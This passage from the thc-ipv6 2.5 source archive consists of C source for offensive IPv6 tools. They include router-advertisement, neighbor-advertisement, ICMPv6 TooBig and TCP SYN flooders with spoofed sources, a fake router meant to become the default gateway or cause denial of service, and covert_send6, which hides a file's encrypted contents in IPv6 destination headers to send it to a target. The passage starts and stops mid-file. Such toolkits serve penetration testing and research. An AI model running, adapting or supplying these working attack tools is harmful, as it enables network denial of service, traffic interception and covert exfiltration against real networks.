exit(-1); } mtu = 1500; size = 64; k = rand(); ip6 = malloc(16); memset(ip6, 0, 16); ip6[0] = 254; ip6[1] = 128; ip6[9] = ( k % 65536) / 256; ip6[10] = k % 256; ip6[15] = 1; k++; if (do_hdr_size) offset = do_hdr_size; memset(buf2, 0, sizeof(buf2)); memset(buf3, 0, sizeof(buf3)); memset(buf, 0, bsize); buf[1] = 250; buf[5] = 30; buf[8] = 5; // mtu buf[9] = 1; buf[12] = mtu / 16777216; buf[13] = (mtu % 16777216) / 65536; buf[14] = (mtu % 65536) / 256; buf[15] = mtu % 256; buf[16] = 1; // mac buf[17] = 1; // 18-23 = mac address buf[19] = 12; j = 24; if (route_only == 0) { for (i = 0; i < cnt; i++) { // prefix buf[j] = 3; // prefix buf[j+1] = 4; buf[j+2] = size; buf[j+3] = 128 + 64 + 32; memcpy(buf + j + 4, (char*) &lifetime + _TAKE4, 4); memcpy(buf + j + 8, (char*) &lifetime + _TAKE4, 4); // buf[j+5] = 2; // buf[j+9] = 1; // memset(&buf[j+16], 255, 8); if (deanon) { buf[j+16] = 0xfd; buf[j+17] = 0x00; } else { buf[j+16] = 0x20; buf[j+17] = 0x12; } buf[j+18] = (k % 65536) / 256; buf[j+19] = k % 256; j += 32; k++; } } if (prefix_only == 0) { for (i = 0; i < cnt; i++) { // route buf[j] = 24; buf[j+1] = 3; buf[j+2] = size; buf[j+3] = 8; memcpy(buf + j + 4, (char*) &lifetime + _TAKE4, 4); // buf[j+5] = 1; // 4-7 lifetime // memset(&buf[j+8], 255, 8); buf[j+8] = 32; buf[j+9] = 4; buf[j+10] = k / 256; buf[j+11] = k % 256; j += 24; k++; } } //printf("DBG: %d entries of %s %s\n", cnt, route_only == 0 ? "prefix" : "", prefix_only == 0 ? 
"route" : ""); //printf("j is %d, bsize %d\n", j, bsize); printf("Starting to flood network with router advertisements on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (until != 1) { memcpy(&buf[20], (char*)&k + _TAKE4, 4); memcpy(ip6 + 11, (char*)&k + _TAKE4, 4); k++; for (i = 0; i < cnt; i++) { if (route_only == 0) memcpy(&buf[24 + 20 + i*32], (char*)&k + _TAKE4, 4); k++; if (prefix_only == 0) { if (route_only == 0) memcpy(&buf[24 + 12 + i*24 + cnt*32], (char*)&k + _TAKE4, 4); else memcpy(&buf[24 + 12 + i*24], (char*)&k + _TAKE4, 4); } k++; } count++; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0, 0)) == NULL) return -1; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, sizeof(buf2)) < 0) return -1; } if (do_frag) { if (type == NXT_ICMP6) type = NXT_FRAG; for (i = 0; i < do_frag; i++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, count + i) < 0) return -1; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return -1; } if (lifetime != 0x03000000) mfoo = 0xff08ffff; else mfoo = 0xff080003; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, mfoo, buf, j, 0) < 0) return -1; if (do_dst || bsize + 40 > thc_get_mtu(interface)) { thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len); hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, ip6, dst, type, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); } else { if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) { printf("!"); } } pkt = thc_destroy_packet(pkt); // usleep(1); if (slow > 0) { printf("slow "); sleep(slow / 2); slow--; } if (count % 1000 == 0) printf("."); if (until > 1) until--; } if (deanon) printf("\nPrivacy extension attack done.\n"); return 0; } thc-ipv6-2.5/ndpexhaust26.c0000644000000000000000000001462312251022440014213 0ustar rootroot#include #include #include #include #include 
#include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-acpPTUrR] [-s sourceip6] interface target-network\n\n", prg); printf("Options:\n"); printf(" -a add a hop-by-hop header with router alert\n"); printf(" -c do not calculate the checksum to save time\n"); printf(" -p send ICMPv6 Echo Requests\n"); printf(" -P send ICMPv6 Echo Reply\n"); printf(" -T send ICMPv6 Time-to-live-exeeded\n"); printf(" -U send ICMPv6 Unreachable (no route)\n"); printf(" -r randomize the source from your /64 prefix\n"); printf(" -R randomize the source fully\n"); printf(" -s sourceip6 use this as source IPv6 address\n"); printf("\nFlood the target /64 network with ICMPv6 TooBig error messages.\n"); printf("This tool version is manyfold more effective than ndpexhaust6.\n"); exit(-1); } #define IDS_STRING 0xbebacefa int main(int argc, char *argv[]) { char *interface, *ptr, buf2[8]; unsigned char *dst = NULL, *dstmac = NULL, *src = NULL, *srcmac = NULL; int i, offset = 14, type = ICMP6_TOOBIG, alert = 0, randsrc = 0, do_crc = 1; unsigned char *pkt = NULL, ip6[8]; int pkt_len = 0, count = 0; thc_ipv6_hdr *hdr; unsigned int filler = IDS_STRING, mychecksum; unsigned char offender[] = { 0x60, 0x00, 0x00, 0x00, 0x01, 0xcd, 0x3a, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x20, 0x03, 0x00, 0x04, 0x00, 0x04, 0x00, 0x04, 0x00, 0x04, 0x00, 0x04, 0x00, 0x04, 0x00, 0x04, 0x80, 0x00, 0xed, 0xc5, 0xfa, 0xce, 0xba, 0xbe, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41 }; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); while ((i = getopt(argc, argv, "acpPTUrRs:")) >= 0) { switch(i) { case 'a': alert = 8; break; case 'c': do_crc = 0; break; case 'p': type = ICMP6_ECHOREQUEST; break; case 'P': type = ICMP6_ECHOREPLY; break; case 'T': type = ICMP6_TTLEXEED; break; case 'U': type = ICMP6_UNREACH; break; case 'r': randsrc = 8; break; case 'R': randsrc = 1; break; case 's': src = thc_resolve6(optarg); break; default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } if (argc - optind < 2) help(argv[0]); interface = argv[optind]; if ((ptr = index(argv[optind + 1], '/')) != NULL) *ptr = 0; if ((dst = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: Can not resolve %s\n", argv[optind + 1]); exit(-1); } if ((srcmac = thc_get_own_mac(interface)) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (src == NULL) if ((src = thc_get_own_ipv6(interface, dst, PREFER_GLOBAL)) == NULL || (src[0] == 0xfe && src[1] == 0x80)) { fprintf(stderr, "Error: no global IPv6 address configured on interface %s\n", interface); exit(-1); } if ((dstmac = thc_get_mac(interface, src, dst)) == NULL) { fprintf(stderr, "Error: can not find a route to target %s\n", argv[2]); exit(-1); } for (i = 0; i < ((sizeof(offender) - 48) / 4); i++) memcpy(offender + 48 + i*4, (char*) &filler + _TAKE4, 4); memcpy(offender + 8, dst, 16); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 255, 0, 0, 0, 0)) == NULL) return -1; if (alert) { memset(buf2, 0, sizeof(buf2)); buf2[0] = 5; buf2[1] = 2; if 
(thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, 6) < 0) return -1; } if (thc_add_icmp6(pkt, &pkt_len, type, 0, 1280, offender, sizeof(offender), 0) < 0) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; if (do_hdr_size) offset = do_hdr_size; printf("Starting to flood target network with toobig %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (1) { for (i = 4; i < 8; i++) ip6[i] = rand() % 256; memcpy(hdr->pkt + offset + 32 + 4, ip6 + 4, 4); memcpy(hdr->pkt + offset + 40 + 8 + 8 + 8 + 4 + alert, ip6 + 4, 4); if (randsrc) { for (i = randsrc; i < 16; i++) hdr->pkt[offset + 8 + i] = rand() % 256; } if (do_crc) { hdr->pkt[offset + 42 + alert] = 0; hdr->pkt[offset + 43 + alert] = 0; mychecksum = checksum_pseudo_header(hdr->pkt + offset + 8, hdr->pkt + offset + 24, NXT_ICMP6, hdr->pkt + offset + 40 + alert, pkt_len - offset - 40 - alert); hdr->pkt[offset + 42 + alert] = mychecksum / 256; hdr->pkt[offset + 43 + alert] = mychecksum % 256; } while (thc_send_pkt(interface, pkt, &pkt_len) < 0) usleep(1); count++; if (count % 1000 == 0) printf("."); } return 0; } thc-ipv6-2.5/covert_send6.c0000644000000000000000000001172712251022434014266 0ustar rootroot#include #include #include #include #ifndef _HAVE_SSL int main() { fprintf(stderr, "Error: thc-ipv6 was compiled without openssl support, covert_send6 disabled.\n"); return -1; } #else #if (_TAKE2 > 0) int main() { fprintf(stderr, "Error: tool does not work on big endian\n"); return -1; } #endif #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-m mtu] [-k key] [-s resend] interface target file [port]\n\n", prg); printf("Options:\n"); printf(" -m mtu specifies the maximum MTU (default: interface MTU, min: 1000)\n"); printf(" -k key encrypt the content with 
Blowfish-160\n"); printf(" -s resend send each packet RESEND number of times, default: 1\n"); printf("\n"); printf("Sends the content of FILE covertly to the target, And its POC - don't except\n"); printf("too much sophistication - its just put into the destination header.\n"); exit(-1); } int main(int argc, char *argv[]) { unsigned char *pkt1 = NULL, rbuf[3570], wbuf[3570], buf[4000]; unsigned char *src6 = NULL, *dst6 = NULL, srcmac[6] = "", *mac = srcmac, *dmac; int pkt1_len = 0, flags = 0, i = 0, mtu = 0, bytes, seq = 0, id, rounds, wbytes, bufsize = 0, send = 2, num = 0; char *interface, *key = NULL, hash[20], vec[8] = { 0, 0, 0, 0, 0, 0, 0, 0 };; int rawmode = 0, tcp_port = -1; FILE *f; BF_KEY bfkey; if (argc < 4 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "rm:k:s:")) >= 0) { switch (i) { case 'r': rawmode = 1; thc_ipv6_rawmode(1); break; case 'k': key = optarg; break; case 'm': mtu = atoi(optarg); break; case 's': send = atoi(optarg); break; default: exit(-1); } } if (argc < optind + 2) { fprintf(stderr, "Error: Not enough parameters!\n"); help(argv[0]); } interface = argv[optind]; dst6 = thc_resolve6(argv[optind + 1]); if ((f = fopen(argv[optind + 2], "r")) == NULL) { fprintf(stderr, "Error: file %s not found\n", argv[optind + 2]); exit(-1); } if (argc >= optind + 4 && argv[optind + 3] != NULL) tcp_port = atoi(argv[optind + 3]); if (mtu == 0) mtu = thc_get_mtu(interface); if (mtu <= 1000) { fprintf(stderr, "Error: MTU of interface %s must be at least 1000 bytes\n", interface); exit(-1); } mac = thc_get_own_mac(interface); src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL); if ((dmac = thc_get_mac(interface, src6, dst6)) == NULL) { fprintf(stderr, "Error: can not get MAC for target\n"); exit(-1); } srand(getpid()); mtu -= 128; if (mtu % 255 == 0) i = 2 * (mtu / 255); else i = 2 + 2 * (mtu / 255); mtu = mtu - i; if ((mtu + i + 14) % 8 > 0) mtu = (((mtu + i + 14) / 8) * 8) - (i + 14); if (mtu > 14 * 255) mtu = 14 * 255; 
if (key != NULL) { memset(&bfkey, 0, sizeof(bfkey)); SHA1((unsigned char *) key, strlen(key), (unsigned char *) hash); BF_set_key(&bfkey, sizeof(hash), (unsigned char *) hash); memset(vec, 0, sizeof(vec)); num = 0; } id = rand(); buf[0] = 16; buf[1] = 4; memcpy(buf + 2, (char *) &id, 4); buf[6] = 17; buf[7] = 4; while ((bytes = fread(rbuf, 1, mtu, f)) > 0) { seq++; if (key != NULL) { BF_cfb64_encrypt((unsigned char *) rbuf, (unsigned char *) wbuf, bytes, &bfkey, (unsigned char *) vec, &num, BF_ENCRYPT); memcpy(rbuf, wbuf, bytes); } memcpy(buf + 8, (char *) &seq, 4); bufsize = 12; rounds = bytes / 255; for (i = 0; i <= rounds; i++) { buf[bufsize] = i + 18; if (i == rounds) wbytes = bytes % 255; else wbytes = 255; buf[bufsize + 1] = wbytes; memcpy(buf + bufsize + 2, rbuf + 255 * i, wbytes); bufsize += wbytes + 2; } if (bytes < mtu) { buf[bufsize] = 0x1f; buf[bufsize + 1] = 0; bufsize = bufsize + 2; } if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt1_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_hdr_dst(pkt1, &pkt1_len, buf, bufsize)) return -1; if (tcp_port == -1) { if (thc_add_icmp6(pkt1, &pkt1_len, ICMP6_ECHOREQUEST, 0, flags, NULL, 0, 0) < 0) return -1; } else { if (thc_add_tcp(pkt1, &pkt1_len, (rand() % 45536) + 10000, tcp_port, rand(), 0, TCP_SYN, 5760, 0, NULL, 0, NULL, 0) < 0) return -1; } if (thc_generate_pkt(interface, mac, dmac, pkt1, &pkt1_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } printf("Sending packet seq# %d\n", seq); for (i = 0; i < send; i++) { thc_send_pkt(interface, pkt1, &pkt1_len); usleep(100); } } printf("All sent.\n"); return 0; } #endif thc-ipv6-2.5/6to4test.sh0000755000000000000000000000073012234222353013547 0ustar rootroot#!/bin/bash test -z "$1" -o "$1" = "-h" -o -z "$2" && { echo Syntax: $0 interface ipv4address echo This little script tests if the IPv4 target has a dynamic 6to4 tunnel active echo Requires address6 and thcping6 from thc-ipv6 exit 1 } 
HEX=`address6 $2 | head -n 2 | tail -n 1 | sed 's/.*:://'` test -z "$HEX" && { echo Error: could not generate ipv6 address from ipv4 address $1 ; exit 1 ; } TARGET="2002:$HEX::$HEX" echo thcping6 $1 $TARGET thcping6 $1 $TARGET thc-ipv6-2.5/fake_solicitate6.c0000644000000000000000000001054612251022436015101 0ustar rootroot #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-DHF] interface ip-address-solicitated [target-address [mac-address-solicitated [source-ip-address]]]\n\n", prg); printf("Solicate IPv6 address on the network, sending it to the all-nodes multicast address\n"); // printf("Option -H adds a hop-by-hop header, -F a one shot fragment header,\n"); // printf("-D adds a large destination header which fragments the packet.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } int main(int argc, char *argv[]) { unsigned char *pkt1 = NULL, buf[24], buf2[6], buf3[1500]; unsigned char *unicast6, *src6 = NULL, *dst6 = NULL, srcmac[16] = "", *mac = srcmac; int pkt1_len = 0, flags, prefer = PREFER_GLOBAL, i, do_hop = 0, do_dst = 0, do_frag = 0, cnt, type = NXT_ICMP6, offset = 14; char *interface; int rawmode = 0; thc_ipv6_hdr *hdr; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); while ((i = getopt(argc, argv, "DFHr")) >= 0) { switch (i) { case 'r': thc_ipv6_rawmode(1); rawmode = 1; break; case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 2) help(argv[0]); if (do_hdr_size) offset = do_hdr_size; interface = argv[optind]; if ((unicast6 = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: %s does 
not resolve to a valid IPv6 address\n", argv[optind + 1]); exit(-1); } if (argc - optind >= 3 && argv[optind + 2] != NULL) dst6 = thc_resolve6(argv[optind + 2]); else dst6 = thc_resolve6("ff02::1"); if (dst6 == NULL) { fprintf(stderr, "Error: could not resolve destination of solicitate: %s\n", argv[optind + 2]); exit(-1); } if (rawmode == 0) { if (argc - optind >= 4 && argv[optind + 3] != NULL) sscanf(argv[optind + 3], "%x:%x:%x:%x:%x:%x", (unsigned int *) &srcmac[0], (unsigned int *) &srcmac[1], (unsigned int *) &srcmac[2], (unsigned int *) &srcmac[3], (unsigned int *) &srcmac[4], (unsigned int *) &srcmac[5]); else mac = thc_get_own_mac(interface); } if (argc - optind >= 5 && argv[optind + 4] != NULL) src6 = thc_resolve6(argv[optind + 4]); else src6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK); if (mac == NULL || src6 == NULL) { fprintf(stderr, "Error: invalid interface %s or invalid mac/ip defined\n", interface); exit(-1); } memset(buf, 0, sizeof(buf)); memcpy(buf, unicast6, 16); buf[16] = 1; buf[17] = 1; memcpy(&buf[18], mac, 6); flags = 0; // ICMP6_NEIGHBORADV_OVERRIDE; memset(buf2, 0, sizeof(buf2)); memset(buf3, 0, sizeof(buf3)); if ((pkt1 = thc_create_ipv6_extended(interface, prefer, &pkt1_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL) return -1; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt1, &pkt1_len, buf2, sizeof(buf2)) < 0) return -1; } if (do_frag) { if (type == NXT_ICMP6) type = NXT_FRAG; for (i = 0; i <= do_frag; i++) if (thc_add_hdr_oneshotfragment(pkt1, &pkt1_len, cnt++) < 0) return -1; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt1, &pkt1_len, buf3, sizeof(buf3)) < 0) return -1; } if (thc_add_icmp6(pkt1, &pkt1_len, ICMP6_NEIGHBORSOL, 0, flags, (unsigned char *) &buf, 24, 0) < 0) return -1; if (thc_generate_pkt(interface, mac, NULL, pkt1, &pkt1_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } printf("Starting solicitation of %s (Press Control-C to end)\n", 
argv[optind + 1]); while (1) { if (do_dst) { hdr = (thc_ipv6_hdr *) pkt1; thc_send_as_fragment6(interface, src6, dst6, type, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); } else { thc_send_pkt(interface, pkt1, &pkt1_len); } sleep(5); } return 0; } thc-ipv6-2.5/flood_advertise6.c0000644000000000000000000000526412251022436015125 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface [target]\n\n", prg); printf("Flood the local network with neighbor advertisements.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } int main(int argc, char *argv[]) { char *interface, mac[6] = ""; unsigned char *mac6 = mac, *ip6; unsigned char buf[24]; unsigned char *dst = thc_resolve6("ff02::1"), *dstmac = thc_get_multicast_mac(dst); int i; unsigned char *pkt = NULL; int pkt_len = 0, flags, rawmode = 0, count = 0; if (argc > 1 && strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[1]; if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (argc == 3) if ((dst = thc_resolve6(argv[2])) == NULL) { fprintf(stderr, "Error: invalid target IPv6 address\n"); exit(-1); } ip6 = malloc(16); mac[0] = 0x00; mac[1] = 0x18; memset(ip6, 0, 16); ip6[0] = 0xfe; ip6[1] = 0x80; ip6[8] = 0x02; ip6[9] = mac[1]; ip6[11] = 0xff; ip6[12] = 0xfe; memset(buf, 0, sizeof(buf)); buf[16] = 2; buf[17] = 1; buf[18] = mac[0]; buf[19] = mac[1]; memcpy(buf, ip6, 16); flags = ICMP6_NEIGHBORADV_OVERRIDE; printf("Starting to flood network with neighbor advertisements on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (1) { 
for (i = 2; i < 6; i++) mac[i] = rand() % 256; // ip6[9] = mac[1]; ip6[10] = mac[2]; ip6[13] = mac[3]; ip6[14] = mac[4]; ip6[15] = mac[5]; count++; memcpy(buf + 10, ip6 + 10, 6); memcpy(&buf[20], mac + 2, 4); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, flags, buf, sizeof(buf), 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) { // fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface); // perror(""); // return -1; printf("!"); } pkt = thc_destroy_packet(pkt); // usleep(1); if (count % 1000 == 0) printf("."); } return 0; } thc-ipv6-2.5/thcsyn6.c0000644000000000000000000001057512251022441013261 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-AcDrRS] [-p port] [-s sourceip6] interface target port\n\n", prg); printf("Options:\n"); printf(" -A send TCP-ACK packets\n"); printf(" -S send TCP-SYN-ACK packets\n"); printf(" -r randomize the source from your /64 prefix\n"); printf(" -R randomize the source fully\n"); printf(" -s sourceip6 use this as source IPv6 address\n"); printf(" -D randomize the destination (treat as /64)\n"); printf(" -p port use fixed source port\n"); printf("\nFlood the target port with TCP-SYN packets. 
If you supply \"x\" as port, it\nis randomized.\n"); exit(-1); } #define IDS_STRING 0xbebacefa int main(int argc, char *argv[]) { char *interface, *ptr, buf2[8]; unsigned char *dst = NULL, *dstmac = NULL, *src = NULL, *srcmac = NULL; int i, type = TCP_SYN, alert = 0, randsrc = 0, randdst = 0, randsrcp = 1, randdstp = 0, dont_crc = 0, seq; unsigned char *pkt = NULL; int pkt_len = 0, count = 0; unsigned short int sport, port; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); while ((i = getopt(argc, argv, "aAcrRsDSp:")) >= 0) { switch(i) { case 'a': alert = 8; break; case 'A': type = TCP_ACK; break; case 'S': type = TCP_SYN + TCP_ACK; break; case 'c': dont_crc = IDS_STRING; break; case 'r': randsrc = 8; break; case 'R': randsrc = 1; break; case 'D': randdst = 8; break; case 'p': sport = atoi(optarg); randsrcp = 0; case 's': src = thc_resolve6(optarg); break; default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } if (argc - optind < 3) help(argv[0]); interface = argv[optind]; if ((ptr = index(argv[optind + 1], '/')) != NULL) *ptr = 0; if ((dst = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: Can not resolve %s\n", argv[optind + 1]); exit(-1); } if (strcasecmp(argv[optind + 2], "x") == 0) randdstp = 1; else port = atoi(argv[optind + 2]); if ((srcmac = thc_get_own_mac(interface)) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (src == NULL) if ((src = thc_get_own_ipv6(interface, dst, PREFER_GLOBAL)) == NULL) { fprintf(stderr, "Error: no IPv6 address configured on interface %s\n", interface); exit(-1); } if (src[0] >= 0xfe && dst[0] < 0xfe) { fprintf(stderr, "Error: link local address on interface, destination however is remote\n"); exit(-1); } if ((dstmac = thc_get_mac(interface, src, dst)) == NULL) { fprintf(stderr, "Error: can not find a route to target %s\n", argv[2]); exit(-1); } 
memset(buf2, 0, sizeof(buf2)); buf2[0] = 5; buf2[1] = 2; printf("Starting to flood target network with TCP%s%s %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", (type & TCP_SYN) > 0 ? "-SYN" : "", (type & TCP_ACK) > 0 ? "-ACK" : "", interface); while (1) { if (randsrc) { for (i = randsrc; i < 16; i++) src[i] = rand() % 256; } if (randdst) { for (i = randdst; i < 16; i++) dst[i] = rand() % 256; } if (randsrcp) sport = rand() % 65536; if (randdstp) port = rand() % 65536; seq = rand(); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 255, 0, 0, 0, 0)) == NULL) return -1; if (alert) { if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, 6) < 0) return -1; } if (thc_add_tcp(pkt, &pkt_len, sport, port, seq, 0, type, 0x3840, 0, NULL, 0, NULL, 0) < 0) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; while (thc_send_pkt(interface, pkt, &pkt_len) < 0) usleep(1); count++; if (count % 1000 == 0) printf("."); } return 0; } thc-ipv6-2.5/fake_router6.c0000644000000000000000000002234412251022436014260 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" char *frbuf, *frbuf2, *frint, buf3[1504]; int frbuflen, frbuf2len, do_hop = 0, do_frag = 0, do_dst = 0, type = NXT_ICMP6, myoff = 14; unsigned char *frip6, *frmac; thc_ipv6_hdr *frhdr = NULL; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-HFD] interface network-address/prefix-length [dns-server [router-ip-link-local [mtu [mac-address]]]]\n\n", prg); printf("Announce yourself as a router and try to become the default router.\n"); printf("If a non-existing link-local or mac address is supplied, this results in a DOS.\n"); printf("Option -H adds hop-by-hop, -F fragmentation header and -D dst header.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } void send_rs_reply(u_char *foo, const struct 
pcap_pkthdr *header, const unsigned char *data) { unsigned char *pkt = NULL, *dstmac = (unsigned char *) data + 6, *dst = (unsigned char *) data + 14 + 8, *ipv6hdr = (unsigned char *) (data + 14); int pkt_len = 0, cnt, i; if (ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[40] != ICMP6_ROUTERSOL || header->caplen < 14 + 40 + 2) return; if ((pkt = thc_create_ipv6_extended(frint, PREFER_LINK, &pkt_len, frip6, dst, 255, 0, 0, 0xe0, 0)) == NULL) return; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, frbuf2len) < 0) return; } if (do_frag) { type = NXT_FRAG; for (i = 0; i <= do_frag; i++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0) return; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff080800, frbuf, frbuflen, 0) < 0) return; if (do_dst) { thc_generate_pkt(frint, frmac, dstmac, pkt, &pkt_len); frhdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(frint, frip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1240); } else { if (thc_generate_and_send_pkt(frint, frmac, dstmac, pkt, &pkt_len) < 0) return; } pkt = thc_destroy_packet(pkt); } int main(int argc, char *argv[]) { char *routerip, *interface, mac[16] = ""; unsigned char *routerip6, *route6, *mac6 = mac, *ip6; unsigned char buf[512], *ptr, buf2[6], string[] = "ip6 and icmp6 and dst ff02::2"; unsigned char *dst = thc_resolve6("ff02::1"); unsigned char *dstmac = thc_get_multicast_mac(dst); unsigned char *dns; int size, mtu = 1500, i, j, k, cnt; unsigned char *pkt = NULL; int pkt_len = 0; int rawmode = 0; pcap_t *p; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "FHDr")) >= 0) { switch (i) { case 'r': thc_ipv6_rawmode(1); rawmode = 1; break; case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); 
